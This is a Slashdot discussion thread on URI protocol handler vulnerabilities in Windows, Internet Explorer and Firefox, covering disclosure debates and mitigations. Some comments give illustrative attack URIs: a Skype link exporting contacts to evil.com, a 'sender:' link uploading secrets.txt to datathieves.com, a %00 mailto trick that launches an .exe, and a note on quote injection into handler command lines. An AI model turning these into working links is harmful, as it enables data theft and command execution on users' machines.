New URI Browser Flaws Worse Than First Thought

narramissic writes "URI (Uniform Resource Identifier) bugs have become a hot topic over the past month, since researcher Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox. Now, security researchers Billy Rios and Nathan McFeters say they've discovered a number of ways attackers could misuse the URI protocol handler technology to steal data from a victim's computer. 'It is possible through the URI to actually steal content form the user's machine and upload that content to a remote server of the attacker's choice,' said McFetters, a senior security advisor for Ernst & Young Global Ltd. 'This is all through functionality that the application provides.'"

The one-liner that kills you

Interesting that URIs can be used to seal information. One line.

Web 2.0 developers have betrayed us all

And this is the end result of their hubris.

AJAX is a hack sat on top of a 15 year legacy of hacks, and ultimately serves no purpose other than giving the 'delicious generation' something to drool at.

Re:Web 2.0 developers have betrayed us all

[Phroggy]

And this is the end result of their hubris.

AJAX is a hack sat on top of a 15 year legacy of hacks, and ultimately serves no purpose other than giving the 'delicious generation' something to drool at. I know I shouldn't feed the trolls, but... you're a fool. This has nothing to do with AJAX or Web 2.0, this has to do with exploiting security holes that have probably been around for over a decade. But more than that: yes, AJAX is useful. When used properly, it can allow you to build a web site that is more powerful and easy-to-use than anything you could do without AJAX. Slashdot's new AJAX-based comment system is definitely an improvement, for example.

Re:Web 2.0 developers have betrayed us all

AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used. It's not clever anymore, now it's just stupid.

Slashdot's new AJAX-based comment system is definitely an improvement, for example.

That doesn't add much to your argument. I liked the old interface better. Maybe next we can argue about whether blue or orange is the better color.

Re:Web 2.0 developers have betrayed us all

[MrNaz]

Yea, that'd be pointless. Blue wins hands down.

Re:Web 2.0 developers have betrayed us all

not with AJAX it don't

Re:Web 2.0 developers have betrayed us all

[DrSkwid]

> AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used.

Using non idempotent GET / HEAD methods is poor programming but the purpose of HTTP is to share data using these methods http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.h tml
HTTPXmlRequests should use those methods as described. It's not the fault of the technology,

HTML/CSS is a display technology, I'm not sure how using it to display things is abuse of its intent.

These flaws don't need XmlHttprequest, is also likely to be a vector

Re:Web 2.0 developers have betrayed us all

No, there is a connection to AJAX: The promise of Web 2.0 is to turn the web browser into an application host. It used to be a browser for information provided by others. It has become a framework for entering and organizing personal information. The security model of a web browser is very fragile and not at all adequate for an application which handles personal data. Everybody flogged Microsoft for trying to merge the desktop and the browser, because that creates an unmanageable mess. Now the web 2.0 crowd goes down the same path, only they don't store the data locally but put it on servers, which makes securing the data even more complicated. This particular bug does not exploit an AJAX bug, but it became possible only because the browser has become the central application on many desktops and users and developers alike found it necessary to integrate it with other applications that handle personal information. It got integrated in ways that are not acceptable for an application which has a network connection.

Re:Web 2.0 developers have betrayed us all

[Phroggy]

That doesn't add much to your argument. I liked the old interface better. Maybe next we can argue about whether blue or orange is the better color. I like the ability to load truncated comments, and read collapsed comments, without reloading the whole page and losing my place in the thread. Being able to moderate a comment immediately, instead of waiting until I get all the way to the bottom of the page, is also nice. There are a few problems still, but generally the problems only affect things that you couldn't do with the old comment system anyway.

I'm curious as to what it is about the old interface that you prefer, or what about the new interface that you don't like.

AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used. It's not clever anymore, now it's just stupid. I agree that HTML wasn't meant to be used in this way, it IS used this way now, and it does a reasonable job. Besides, the alternative is proprietary applications that only run on certain platforms and don't work half the time. If that's the alternative, I fail to see how AJAX is stupid.

Of course, any technology can be used for stupid purposes. But that's really not an issue of technology, is it?

Re:Web 2.0 developers have betrayed us all

[HobophobE]

Slashdot's new AJAX-based comment system is definitely an improvement, for example.

Tell that to the moderators. Until the new comment system I never made a moderation error. With the new system as soon as I select a moderation for a comment it gets applied. Recently I was moderating and I accidentally moved my mouse over the wrong rating (I meant insightful, but accidentally hit redundant); there was no way (as far as I could tell) to undo this mistake.

With the old system you selected mods for all comments in a discussion you wanted to moderate, then clicked "moderate." That way if you selected the wrong moderation it wasn't instant. Maybe I should turn off the new comment system when I'm moderating, but the simpler solution would be to give me an option (is there one?) to turn off 'instant moderation.'

Please reply if there's a way to make sure I don't do that again, as it bums me out when someone is unjustly moderated simply due to a combination of bad design and human error.

Re:Web 2.0 developers have betrayed us all

You can undo moderation by posting (logged in) to that thread.

Re:Web 2.0 developers have betrayed us all

[DrSkwid]

where the vector I forgot to escape is :

Re:Web 2.0 developers have betrayed us all

[Phroggy]

Yeah, that is a problem. I haven't done it yet, but there should be some kind of confirmation. They could keep the existing concept and just add a JavaScript confirm() dialog, or they could add an extra button you have to click next to the menu. As far as I know, there's no way to change a moderation, other than posting to undo all moderations to that article as the AC mentioned.

Easy to fix. Just hasn't been fixed yet.

Oh my

[zmotula]

There is not a SINGLE technical detail about the bug in the article. The first paragraph pretty much says it all:

Security researchers Billy Rios and Nathan McFeters say they've discovered a new way that the URI (Uniform Resource Identifier) protocol handler technology, used by Windows to launch programs through the browser, can be misused to steal data from a victim's computer.

It is impossible to say whether this bug is really exploitable, whether it matters at all. So far they ("security researchers") can be only getting a free publicity. Is this news for nerds?

Re:Oh my

First, it's not a bug, it's a feature.

There is no need for a specific example because it's the whole concept of custom URI handlers that is a security nightmare. It's another one of those ideas which I'm sure seemed good a the time though nobody thought ten seconds about the obvious security issues.

The right thing to do now is to disable that feature by default and accept that people are going to whine for a while because their ed2k: URIs don't work anymore and they have to manually start their softwares (oh, the humanity!).

Re:Oh my

it's the whole concept of custom URI handlers that is a security nightmare Why?

The implementation may be flawed, but I see nothing about the concept itself that opens itself up to attack.
Sure, you could have a fuckmenow: protocol that launches a keylogger and starts sending data somewhere - but the keylogger would have to be installed, and would have to have registered the custom URI. If it can do that, it can fuck you in so many more ways that don't need the browser.

Re:Oh my

[jkrise]

There is not a SINGLE technical detail about the bug in the article. The first paragraph pretty much says it all

If you actually read through till the last para, you ill note that the bug has something to do with Microsoft, Registry, Internet Explorer and registering programs.

Re:Oh my

[MrNaz]

It's because the whole idea of launching apps on the user's computer with whatever parameters one wants is really, only one step away from executing arbitrary code.

Think
callto://skypeuser?some&params&that&induce&sending &contacts&someone&else

Or something similar. I think the MS guy shouldn't have said "We at MS don't think we should be responsible for this" as it sounds like they *could* do something if they wanted. He really should have said "We can't stop stupid software makers being stupid. We can do bugger all about this." It's not often MS can legitimately pass the security buck, I'm surprised they didn't ride it for all it's worth this time.

Re:Oh my

[hanshotfirst]

There is not a SINGLE technical detail about the bug in the article.

That's on purpose - they don't want their article to give hackers any real direction on how to exploit it. From TFA..."Rios and McFetters plan to release the results of their research after the vendor has had a chance to fix the problem".

Yes, this is news for nerds - I know I'll be avoiding the URI protocol cautiously, if at all. I am duly informed. (Of course a real nerd would have known this already, so I have to turn in my card, I guess.)

Nothing to gripe about here - move along.

Re:Oh my

[Opportunist]

I have a working example here on my desk. The problem is it's so effing trivial that it's not even funny. Unlike buffer overflows or other exploits that at least require some kind of understanding, this requires a trained monkey who can use a keyboard.

I'm usually all for the spread of information, but this has the potential to be a scriptkiddy's wet dream. And as I've stated before, I don't fear the hacker, I fear the scriptkiddy. Not because he's smart, but because he's many and he drowns you simply with quantity, not quality.

Re:Oh my

[martin-boundary]

That's on purpose - they don't want their article to give hackers any real direction on how to exploit it.

Sorry, but that's bullshit. Anyone can say they discovered an exploit, heck I discovered 14 just today while brushing my teeth :)

The only thing that happens when people "claim" to have discovered an exploit without proof is that a lot of gullible people start panicking and unscrupulous reporters and bloggers who'll propagate the rumour for weeks. It's like yelling "fire" in a crowded room.

If they really have an exploit, they should just share it or STFU. There's enough garbage information on the internet as is, there's no need for them to the dung pile.

Re:Oh my

[Fred_A]

There is not a SINGLE technical detail about the bug in the article. Except that this is (yet again) a Windows only problem, a fact which the summary could have pointed out thus saving me the effort of browsing the article (and having to kill that stupid ad iframe I couldn't even close).

Re:Oh my

[CaymanIslandCarpedie]

Patience grasshopper, details will be released soon enough. Their method of reporting seems to be becoming kind of an accepted best practice for "responsible reporting" of bugs. I fully support ones right to just release day 0 exploit sample code if they so choose, though I don't think it's the best idea. It seems notifying the makers of effected software at roughly same time as releasing very high level information about the exploit is becoming the best way to both avoid in the wild attacks as well as ensure the issue is addressed.

In this case, additional researchers have even verified the issue after the initial report. If you still don't believe there is an issue (fair enough it's good to be skeptical), you can always do a tad of research into these researches history to help decide if you think they are trustworthy or not. If still that isn't enough, well then I guess you'll have to just find these issues yourself and you can publish anything you want about them. Until then the researchers who find an issue should have the right to handle it any way they choose. They don't answer to you.

It's like yelling "fire" in a crowded room.

Seems more like they are more warning that there is a pile of debris in the room which could be a fire hazard. You suggestion would be more like noticing that fire hazard and deciding to dump gas on it and then toss on a match.

Re:Oh my

We can't stop stupid software makers being stupid. We can do bugger all about this.

Some of it can't be stopped, some of it like the %00 bug breaks their own documentation and should be.

What's really needed is for anyone who registers a url: handler to recognize that anything could be passed to them by anyone when they click on it. If their commandline accepts options that are even possibly remotely dangerous, then they should implement the -- "nothing after here is an option" option, and use it in their handler.

Re:Oh my

[martin-boundary]

Why should the onus be on others to check their work for them? Can't they check their own work before making an announcement?

It's very nice of them if they want to give the vendors time to fix their software, but they should announce their results _after_ the patch is ready in that case. Announcing early and claiming "responsible reporting" while not explaining enough for users to protect themselves is a publicity stunt.

Here's a few things that I think are wrong with the "responsible reporting" idea: it publically slanders software products without proof. It causes people to worry about undisclosed threats which may or may not affect them. It turns security research into a hype game where advisories must be taken on faith rather than fact.

These problems go away if the researchers either announce with proof ASAP, or if they announce once a patch is ready.

/2 cents.

Re:Oh my

[MikeBabcock]

You don't need to provide a working example to explain the details. They could be saying something like:

if you've installed vulnerable 3rd party url handlers, clicking malformed urls could lead to exploits

in which case I don't care at all.

I'm sure there are people who install 3rd party URL handlers as willy nilly as they install free screensavers and weather applets, but I don't, and neither should they, so again, I don't care.

If on the other hand they're saying there's a URI parsing error in major browsers that is itself exploitable, that's different. Details are important. You could yell "fire" in a crowded theatre because you saw someone light a lighter, and you wouldn't be lying, but you left out a few good details.

Re:Oh my

[nagora]

it's the whole concept of custom URI handlers that is a security nightmare

Why?

Because the more protocols your browser handles the less likely you are to know what's strange behaviour. The user gets a "learnt helplessness" response and just clicks on "OK" - or the equivilent - when they don't recognise what's happening because they've become used to not recognising what's happening.

A web browser should ONLY handle HTTP. Not FTP, not sFTP, not POP3, IMAP, or SMTP, not BitTorrent, not RealPlay, etc etc. By all means launch external programs to handle such things, which will hopefully alert the user to something happening, but hiding all these non-web-browsing activities from the user is a phisher's dream.

Re:Oh my

[CaymanIslandCarpedie]

These problems go away if the researchers either announce with proof ASAP, or if they announce once a patch is ready.

I don't think either of those suggestions are "bad", just that sadly they have historically had thier own issues which at least in many peoples opinions outway the gains of those methods.

"announce with proof ASAP" - sadly history shows that when this is done unscrupulous people will then take that knowledge and use it to create malware which can cause MAJOR damage. This is why there has been talk of even making this illegal (which I COMPLETELY disagree with). It is true that "with proof" a tiny percentage of the computer using population will be able to avoid the issue. However, the VAST majority still won't even hear of the issue (as they don't follow such news) let alone know what to do about it. The result is hackers are given the gift of complete knowledge of an exploit which many millions of computers and users will have no defense against.

"announce once a patch is ready" - again sadly it has been shown over and over again that many (if not most) products will not put the urgency into a security fix unless there is public pressure to do so. This has certainly improved greatly over the last decade, but I still don't think we are at a point where we can trust them on this without pressure.

There is a fairly popular variation on your second idea which is to notify the software developer but don't announce until you have given them reasonable time to patch it. This will give them the chance to do the "right thing" on thier own without the public pressure but researchers can still release the information later if they feel the patch is too long in coming.

I actually do prefer that option, but there is the arguement that a company will never feel quite the sense of urgency as they would when an overview of the issue hits the media. And it follows that then the patch will take longer and someone less than altruistic could also find the same issue in the mean time and release an exploit.

I don't have a real strong preference between the options of notify the software developers first and wait a reasonable amount of time, or notify and release high level overview at the same time. I'd actually probably have a slight preference for the former, but it does seem the later is the more popular. Probably for the reasons you give, that they want to be sure they are given the credit (and attention) of the find ;-)

Re:Oh my

[Sponge+Bath]

... something to do with Microsoft, Registry, Internet Explorer

That unholy trinity does not give me a warm and fuzzy feeling.

Re:Oh my

[KE1LR]

Aha, the missing piece!

1:Find ad popup code that can't be killed easily.
2:Claim to Slashdot that you've discovered a trivial but really nasty browser exploit that nobody knows about, and provide a link to an article that says the same thing.
3:Watch your ad views rack up.
4:Profit!

Re:Oh my

[SkunkPussy]

I think you miss the point - the entire security risk IS when the web browser launches another application.

Re:Oh my

[nagora]

I think you miss the point - the entire security risk IS when the web browser launches another application.

I was thinking more in terms of applications having a GUI, but on reflection it would be better to not allow your browser to do anything with non-http links.

TWW

Re:Oh my

[Intron]

mozilla bug 389580

"On Windows XP some urls for "web" protocols that contain %00 launch the wrong
handler and appear to be able to launch local programs, with limited argument
passing. It is not yet clear that this can be used to compromise a machine but
we can always fear the worst.

The same behavior is observed using "Run" from the Windows Start menu for the
affected protocols (http, https, ftp, gopher, telnet, mailto, news, snews,
nttp, possibly others?).

The behavior seems to be that if there's a %00 in the URL for these schemes
then the URL Protocol handler is not called, instead the FileType handler is
called based on the extension of the full url. The url is then passed to that
File handler. For "non-web" URL handlers the URL is passed to the expected
handler.

In Firefox browser protocols are handled internally so are not vulnerable, but
the mailnews protocols are handed off to the OS and can be abused in this way."

====
So you can construct a uri like: "mailto:/...%00...something.exe"
Firefox sees mailto and hands it to Windows to give it to the mail program
Windows sees %00 and mistakenly hands it to the FileType handler.
The FileType handler sees ".exe" and runs the program.

Re:Oh my

That was the old bug. The article is about using the URI handler facility as designed, without exploiting implementation bugs, and still getting access to personal data.

Re:Oh my

[jdavidb]

It'd also help if they'd clarify their terminology:

a browser could be tricked into sending malformed data to Firefox.

Firefox is a browser, last I checked. So if I'm not using another browser, no browsers will be sending any data to firefox, and I'll therefore be safe, right? This doesn't make any sense. What are they really trying to say?

Re:Oh my

[nmcfeters]

Gents, please keep in mind that we did not post this original story. If you want to see the technical content, you should actually go and read the research we posted at our site XS-Sniper. This was not referenced in the article. As for the security.itworld.com link that references stealing user's data, this is a new story that we were just interviewed on a couple of days ago. The vulnerability is real, and will be released after appropriate communications with the vendor. Thanks, Nate

Re:Oh my

The article mentions that Firefox registers a FirefoxURL URI. Typing a FirefoxURL URI into *some other browser* causes Firefox to be launched and given the URI.

My guess (and this is just a guess) is that this is a way to bypass some URI checking/validation; by handing Firefox a URI this way, it just plain assumes it's good and doesn't look for any weird stuff.

Re:Oh my

[nmcfeters]

Again, people are reading other peoples words as though they are ours. Please see our page for the information... a simple Google search would've provided you with this info. XS-Sniper Thanks, Nate

Re:Oh my

[Rudisaurus]

mod parent up (Informative) (waits interminably for /. to decide it took long enough to type 4 words)

Re:Oh my

[jimbojw]

For anyone looking for more information about this problem, here you go:

• Affected OS: Windows
• Affected Browser(s): IE 7 + Firefox (together)
• Cert advisory: https://www.kb.cert.org/vuls/id/403150
• Secwatch advisory: http://secwatch.org/advisories/1018594/

Here are some useful excerpts from the Cert advisory:

Internet Explorer 7 has changed how Microsoft Windows parses URIs. This has introduced a flaw that can cause Windows to incorrectly determine the appropriate handler for the protocol specified in a URI. This flaw appears to rely on having a "%" character in the URI.

Publicly available exploit code uses Mozilla Firefox as an attack vector for this vulnerability. For more information, including workarounds, please see VU#783400

It seems that the injection mechanism is to use Firefox, but the exploit requires IE 7 to be installed on the victim's computer.

Interesting excerpts from the secwatch advisory:

The vulnerability is due to an input validation error handling system default URIs with registered URI handlers such as "mailto", "news", "nntp", "snews" and "telnet". This can be exploited to execute arbitrary commands when a user e.g. using Firefox visits a malicious website with a specially crafted "mailto" URI containing a "%" character and ends in a certain extension (e.g. ".bat", ".cmd")

Confirmed on a fully patched Windows XP SP2 and Windows Server 2003 SP2 system using Firefox version 2.0.0.5 and Netscape Navigator version 9.0b2. Other versions and browsers may also be affected.

In the comments to this article a user by the name of kruador points out:

This is utter rubbish. ShellExecuteEx wasn't updated with IE 7.0. It is a core OS feature - on Windows XP SP2 systems the most recent update was in the MS07-006 security update.

All this function does is look up the URL protocol handler in the registry - for example, http: is at HKEY_CLASSES_ROOT\http - and look for the shell\open key. If a ddeexec key is found under that key, it uses DDE to send the URL to the registered program. If not, it runs the command under the command key, replacing the %1 in the command line with the URL to be processed.

IE uses ShellExecuteEx whenever it encounters a URL protocol it does not handle internally - basically only http:, https: and ftp:. The Windows Explorer 'Run' dialog calls ShellExecuteEx when you enter a URL into the dialog (in fact, when you enter *anything* into the dialog). It's how Explorer locates a program when you double-click a document file.

The question here is a difference of opinion over whether certain characters should be escaped in the command line or not. The behaviour of ShellExecute[Ex] has not changed. Microsoft are simply saying that Firefox has to cope with whatever it's presented with; Mozilla are saying it would be nice if certain characters were escaped.

[UPDATE:] I have since discovered that Internet Explorer decodes URL-encoded (%-encoded) characters and passes the decoded version to ShellExecuteEx. This allows an attacker to inject " characters into the command line, terminating the URL argument, and allowing further command line options to be specified.

And most importantly, he concludes with:

The simplest workaround is to place a special command line option in first position (included in the command line in the registry, before "%1") that indicates that the rest of the command line came from a URL protocol handler and should be treated with caution.

Sounds like some registry hacking could solve the problem.

Re:Oh my

[looseSpark]

As long as the browser prompts the user and gives them adequate warning of the risks then the security risk is mainly the USER not the browser, in my opinion.

I don't want the inconvenience of being forced to open an application manually and most people wouldn't so the solution is making sure users know what they are doing.

Re:Oh my

[PlusFiveTroll]

What ads? Adblock and no-script are your friends.

Not anonymous!!!!!!

[brindafella]

I am NOT anonymous!!! And, perhaps the first to say so!!!!

Re:Not anonymous!!!!!!

I am NOT brindafella!!! And, perhaps the first to say so!!!!

Re:Not anonymous!!!!!!

[Mathinker]

I am NOT sure you're NOT brindafella!!! And, perhaps, this makes your post all the funnier!!!!

FTA:

[tygerstripes]

By using these custom URI protocol names, software developers are trying to make lives easier for their customers.

The article also states that this is a "hacker's dream and a programmer's nightmare".

When a similar problem kicked off with the firefox:// protocol in IE all anyone could say was "Why the hell would anyone use this?" The answer seemed to be along the lines of "Nobody does - it was a stupid thing to include in the first place."

Sounds like the same problem to me - and unnecessary and unsuitable solution to a non-existent problem causing far worse problems. As the proverb goes: if it ain't broke, don't start shoe-horning new and unsecured protocol-handling into the registry.

Re:FTA:

Can't we just have a browser that does... browsing? No fancy JS, Java, VMs, or whatever.
The Gopher:// times really were good for something.

Re:FTA:

Just turn those goddamn things off in Firefox if you want to be a fucking Luddite, and shut the fuck up.

Re:FTA:

[a.d.trick]

Nobody does - it was a stupid thing to include in the first place

First off, it was called firefoxurl://. Second, it is used - by Windows. This is part of what is required when registering a browser on that OS. It's pretty important if you want to set Firefox as the default browser.

Re:FTA:

[Skrynesaver]

Lynx is still available, still maintained and I rarely need to pull the images down to get the details i require.
A picture is worth a thousand words, even with jpeg compression

News?

[Opportunist]

"It's a hacker's dream and programmer's nightmare," said Eric Schultze, chief security architect with Shavlik Technologies LLC. "I think over the next six to nine months, hackers are going to find lots of ways to exploit standard applications to do non-standard functions."

That's not news. That's old. Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: http://www.microsoft.com).

The new part is that the URL/URI contains malformed links. Links, that don't just take you somewhere or offer you a torrent, but links that exploit a bug in your application. But it will hit the same group of people: Clickmonkeys who don't know what they're doing in the first place.

Re:News?

[ozmanjusri]

Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: www.microsoft.com.

Thanks dude!

I installed that update to XP, and now my computer runs like a dream. Microsoft finally got it right!

Re:News?

[walt-sjc]

When you hover over your example link, it shows where you are really going.

When you use Evil JavaScript(tm) you can REALLY fuck with the user, who will have NO idea where the link goes, which is why tools like NoScript are so important. Don't surf naked - use NoScript. Don't get me wrong, javascript can be useful, but so many sites use it gratuitously. They use it for things like roll-over highlighting, when CSS does it cleaner with less code. Most sites I visit seem to use javascript now. Less than half actually need it as NoScript has proven.

Re:News?

[Opportunist]

You should check out their new browser too, at IE7.com. It's really amazing! I don't know what they did, but even the exploits that should work on Internet Explorer 7 don't!

Re:News?

[Opportunist]

JS is mostly used as a gadget to "enhance" a site (read: Make it so flashy that nobody notices the lack of content). Like so many other technologies that clutter our pages today.

Take Flash. Yes, it can actually be put to good use. Pages have used it to really increase the usability and accessability of the content. But most just use it to create a flashy show to hide the lack of content or meaning.

And yes, noscript and other security tools are important. But until this gets through to the clickmonkeys, it will be a very good way to get malware spread. It's just like mail. Mail is currently still the main delivery route for malware, but this starts to decline. More and more people get aware that their "invoice.pdf" is actually an "invoice.pdf.exe" and that it's probably not a good idea to open any kind of content sent to you. I can see it very well in the amount of malware and its source that runs past my desk. Until about 6 months, a good 80% of malware came actually out of mails. We're down to about 50 by now. In a year, mail might only play a minor role in malware distribution, simply because finally everyone realized that clicking on those attachments is a bad idea.

So new spreading routines surface. Mail was just chosen because it's such a simple way. All you needed was a botnet (or renting one) and you could sensibly assume some good penetration. Malware creators do check the "success" of their spreading methods, and they realized a decline. So new roads have to be found. Spreading through webpages and links is harder, but also currently more rewarding. Few people use noscript. Few people even know that a link can be a threat (compared to the amount of people that know in the meantime that an attachment can be a threat, virtually nobody knows about the link threat). So it's a very rewarding way of spreading.

What can be done? The usual. Reconfigure your honeypots, start creating site harvesting tools, inform the users.

Re:News?

[tygerstripes]

You installed Gentoo in less than 48 hours? Christ, how times change...

Re:News?

[iogan]

Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: www.microsoft.com.

Thanks dude! I installed that update to XP, and now my computer runs like a dream. Microsoft finally got it right!

Me too! It took most of the weekend, but it was well worth it... :)

Re:News?

[Zaiff+Urgulbunger]

The irony being that *this* browser being installed on Windows was where this bug was first discovered?

Re:News?

[borawjm]

Clickmonkeys who don't know what they're doing in the first place.

When porn is involved, clicking is usually irrational. Just think about that time you drank to much and had a questionable hookup (okay, I know this is /. but bare with me). Now apply that to porn browsing and you may find yourself booting up your computer one day and saying, "Man, what the hell did I click last night?"

Re:News?

[Opportunist]

...but bare with me

Most certainly not! I barely know you!

Though... we can change that...

Re:News?

You installed Gentoo in less than 48 hours? Christ, how times change...

Moore's law.

Responsible application launching

[JosefAssad]

Some of the discussion around this issue revolves around URI validation. Given that third parties can assign their own handlers, I don't think it's the browser's job to validate URIs, but it can provide the facilities to do so.

It would probably just be simpler to disable this functionality by default; I suspect not many people are really using their browser to launch other applications or do much beyond straightforward browsing (you konqueror people are something completely different!), or at least not to any meaningful extent. Where they are, some form of URI whitelist could do the job.

I don't think browsers are going to stop being capable of launching applications overnight; I fully acknowledge that a lot of enterprise systems rely on this. But it can certainly be done more responsibly.

Re:Responsible application launching

[Opportunist]

I don't think browsers are going to stop being capable of launching applications overnight

Then how about letting me, the user, decide? Instead of simply activating everything, ask me whether I want a certain application to launch? I think I remember seeing something like this in a browser, forgot which one it was... FF, I think.

Re:Responsible application launching

[Constantine+XVI]

In Opera:

click on a "special" link, like <URL:ed2k://|file|ubuntu-7.04-desktop-i386.[conten t.emule-project.net].iso|731797504|E239215147FA03E 5DB3D6C816291BFCA|/> (If you look at that URI, it's for an ed2k download of Ubuntu 7.04)<br>
Opera says: "Would you like to open $PROGRAM to use this link?"

Re:Responsible application launching

[Goaway]

Yes, because asking "Would you like to open Firefox to use this link?" is such a clear indication that your system is about to be hacked.

Re:Responsible application launching

[betterunixthanunix]

Really? Because I use Konqueror's URI handlers for all of this: sftp, zip, tar, http, https, and ftp, and they are all useful. The problem with the Windows URI bug is that it allows an attacker to launch arbitrary programs, even programs without registered URI handlers, by passing arguments to certain registered programs (at least that is how I understand this vulnerability). It would be like using one of my KDE URI handlers to open a terminal; a malicious website could use that to start executing random commands on my system.

The difference is that most Windows users are running as administrator, so an attacker could use this vulnerability to install something bad like a keystroke logger or some sort of worm, whereas they could only corrupt my home directory. This is just another example of why you shouldn't run as a superuser on a system connected to a public network...or any system at all.

Re:Responsible application launching

[archen]

Agreed, this is an extremely handy feature - especially when you consider the implications for integration with other applications. I created a database to track things on our network which worked pretty well. But then doing support remotely got to be a bit tedious since I would have to look up the info, cut and paste the computer name into $program, and so on. Now I can add handlers in firefox like rdesktop:// and vnc:// that allow it to fully integrate into a simple system.

Better protections would be good, but I'd hate to see this functionality simply removed.

Re:Responsible application launching

[TheNicestGuy]

What I find interesting is that Internet Explorer has, from the very beginning, had a little tab on its settings window to choose your preferred programs for the more common URI protocols like mail and news. So we've known for a long time that it is useful for browsers to be able to hand off non-http protocols to external programs, and that it's the sort of thing that a user might want to configure and customize themselves. How come these days it seems like all the management of that (in Windows at least) happens silently behind the scenes, and the user can't touch it without hacking the registry? Why hasn't the Programs tab of the Internet Options control panel evolved to a completely customizable list of protocol handlers, just the same as the one for file extensions? I haven't used Vista; does its infamous "allow or cancel" watchdog notify you of changes to your registered protocol handlers? It seems to me that the first step in dealing with these "browser flaws" is to bring this piece of the OS into the light and give the user control over it.

Re:Responsible application launching

[Goaway]

Sarcasm is... redundant?

What is the OS coverage?

[pembo13]

If this only works on Windows, then I feel fairly secure; I rarely keep important files on my Windows machine. If this works in Linux, then I'll have to leave Firefox off for awhile.

Re:What is the OS coverage?

[mabinogi]

"It" doesn't work anywhere, because "it" is nothing but random speculation that an application that has registered a URI handler _might_ have a bug in it.
Sure, that's a pretty reasonable assumption, but it's idiotic to blame it on the URI handler stuff, the web browser, or the operating system.

If there is such a bug in an application that has registered a custom URI, then any fault for any bug that may or may not exist lies squarely with the makers of that application.

The title of this submission has nothing whatsoever to do with TFA.

Re:What is the OS coverage?

[IBBoard]

Only it's not that the application may have a bug, but that it may have an intentional feature that is useful for users that can then be exploited through a link. It might have less security than it should, but that's poor planning and not a bug.

Take someone's earlier example of Skype. Lets assume you can do "skype --export-contacts --dest /some/path/here". Nice and useful for when you're migrating settings on your own desktop. Now assume that Skype also lets you export to your website so that you can publish it to your site, so you can put a HTTP in there. Now assume that users have complained about popups prompting them and that they want a batch mode that lets them export each night to make sure they never lose data - so it doesn't prompt.

You'd now have something like "skype --export-contacts --dest http://www.example.com/mybackupscript --batch-mode". It does exactly what you want, you can archive your contacts, and you can event do it overnight to a remote location so it's accessible to you from anywhere and won't be lost in a disk crash. Only someone didn't secure it very well (again, bad implementation, not a bug) and someone somehow gets you to click on a link saying "skype:export-contacts&dest=http://www.evil.com/my backupscript&batch-mode". That 'feature' is now being exploited to export your contacts to an arbitrary site without you even necessarily knowing.

I'm sure there are lots of other similar alternatives, but the whole point is that it's badly validated input and not a bug. It's fairly sensible to have "skype:call-userid" as a link so that you can run up Skype and call someone. What it's not sensible to do is let that URI call do anything that can be done locally.

Re:What is the OS coverage?

[PhilHibbs]

It doesn't have to be a bug, it just has to be a poorly-thought-out feature. For instance, a file transfer application that can be invoked from a handler, e.g. clicking sender:source=c:/secrets.txt?target=http://datathi eves.com on a web page could invoke the "sender" handler application to send your secrets.txt to datathieves.com - is this a bug, or just a stupid application doing something unfortunate?

Re:What is the OS coverage?

but the whole point is that it's badly validated input and not a bug.

Call me crazy, but isn't that just semantic nonsense? A program not validating input would seem like a bug to me...

Re:What is the OS coverage?

[aziraphale]

Indeed - although I'd say that 'bad implementation' that leads to a 'security hole' qualifies as a bug. In fact, probably a priority one bug. But I'm picky about how the apps I ship treat their users' data.

Easily mitigated, too, of course, because there's no rule that says that Skype's installer has to register the same executable as its protocol handler as it uses to handle user input at the command line. Use different executables, and the risk goes away. A small protocol handling exe that validates the input, extracts the information it needs, and uses it to launch the main Skype program is not going to be a huge additional component in an installation.

Register a protocol handler in the Windows registry, and you're taking responsibility for handling any URL you're given that begins with that protocol. It's not that hard to understand. Why people keep on insisting this is somehow a flaw in Windows I don't know...

Re:What is the OS coverage?

[IBBoard]

I was talking to a work-mate after posting that and he said a similar thing - it depends what you class as a bug, it could be a security bug.

IMO it wouldn't be a bug. To me a bug is something that shouldn't be happening, full stop. e.g. ability to inject data (as you can with a bad PHP script, register global variables and a specially constructed query string), ability to corrupt data or cause crashes (as you can do with a buffer overflow) or ability to bypass a security measure through some simple means (like my college's web filtering software that let you get to blockedexample.com by going to something like http://example.com/).

This, on the other hand, is just lax security or bad separation in design. It might be functionality that you want on the whole and hence a feature (as in my example) but to me registering the whole EXE is a bad choice, not checking the input when invoked in that way (if it's possible) is a bad choice, allowing the data sending without confirmations was potentially a bad choice, and so on.

Having said all that then I would still expect it to turn up in a bug tracking app ;) But phpBB have a separate "security bug tracker".

Re:What is the OS coverage?

[IBBoard]

IMO, only when it leads to unexpected behaviour. In this situation it might be expected behaviour, but behaviour that shouldn't sensibly have been made public. That makes it a security issue and a bad design decision, but not necessarily a bug (under my interpretation of 'bug' in software)

See http://it.slashdot.org/comments.pl?sid=271163&thre shold=-1&commentsort=0&mode=thread&pid=20248365#20 248719 for my longer response.

Whew...

[Spy+der+Mann]

Good thing I use Firefox and not that "URI browser". I feel safe.

Re:Whew...

[Carthag]

Don't be too careless. Apparently the URI Browser can be tricked into sending malicious data to Firefox!!

Yeah, yeah

[nagora]

It'll be a cold day in hell before I take security advice from a bunch of crooks like Ernst & Young. Presumably there's some obscure way they can make money out of this announcement.

Re:Microsoft do it again

[MrNaz]

Hey numbnuts, I know this is /. but there is nothing that MS can do to help this, nor anything they can do to mitigate the harm. Cut it out with the vitriol. You idiots have such double standards and it's starting to make me sick. When MS does it, it gets labeled FUD. When you do it it gets labeled +1 Insightful. I mean FFS, lets cut out the crap. Now go ahead. Mod me down. I got karma to burn. Fuckers.

OT

[Opportunist]

Mind if I linked to your journal entry next time I need to write something about security? It would save me a lot of typing...

Re:OT

[Spy+der+Mann]

Mind if I linked to your journal entry next time I need to write something about security?

sure, Opportunist. (pun intended)

Re:OT

[Spy+der+Mann]

p.s. I updated my journal. Here's the php security mistakes entry.

Better late than never

showed how a browser could be tricked into sending malformed data to Firefox

Oh shit. I had better switch to IE then!

Custom prefixes... blah!

[billcopc]

